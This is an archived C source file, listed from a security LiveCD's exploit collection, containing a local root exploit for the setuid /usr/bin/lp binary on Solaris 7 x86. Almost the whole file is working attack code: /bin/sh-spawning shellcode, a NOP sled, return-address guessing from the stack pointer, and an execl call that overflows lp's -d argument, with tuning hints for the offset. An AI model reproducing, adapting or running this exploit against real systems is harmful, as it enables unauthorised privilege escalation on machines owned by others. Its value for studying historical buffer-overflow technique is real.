home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / lp-solaris7-of-x86.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  1.3 KB  |  50 lines
  1. /*      
  2.  *      
  3.  * solaris 2.7 /usr/bin/lp local exploit, i386.
  4.  *
  5.  * discovered by DiGiT.
  6.  * try offset 150-250 if sploit fails
  7.  *
  8.  * greets: #!ADM, #!security.is, #hax, duke
  9.  *
  10.  * DiGiT - teddi@linux.is 
  11.  *
  12.  */
  13.  
  14. #include <stdio.h>
  15. #include <stdlib.h> 
  16.  
  17.  
  18. char shellcode[] =
  19.  "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
  20.  "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
  21.  "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
  22.  "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
  23.  "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
  24.  "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
  25.   
  26. #define BUFSIZE  1100  
  27.  
  28. long get_esp() { __asm__("movl %esp,%eax"); }
  29.  
  30. int main(int argc, char *argv[]) {
  31.  
  32.   char buff[BUFSIZE];
  33.   int nopcount=501, offset=260;
  34.   int i;
  35.  
  36.   if (argc > 1) offset = atoi(argv[1]);
  37.   if (argc > 2) nopcount  = atoi(argv[2]);
  38.  
  39.         memset (buff, 0x90, BUFSIZE);
  40.  
  41.                 for (i = nopcount; i < BUFSIZE - 4; i += 4)
  42.                 *(long *) &buff[i] = get_esp() + offset;
  43.         memcpy (buff + (nopcount - strlen (shellcode)), shellcode, strlen
  44.         (shellcode));
  45.  
  46.             memcpy (buff, ":", 1);
  47.             printf("Addr = 0x%x\n", get_esp() + offset);
  48.          execl("/usr/bin/lp", "lp", "-d", buff, "-p", "/tmp/ps_data",NULL);
  49. }
  50.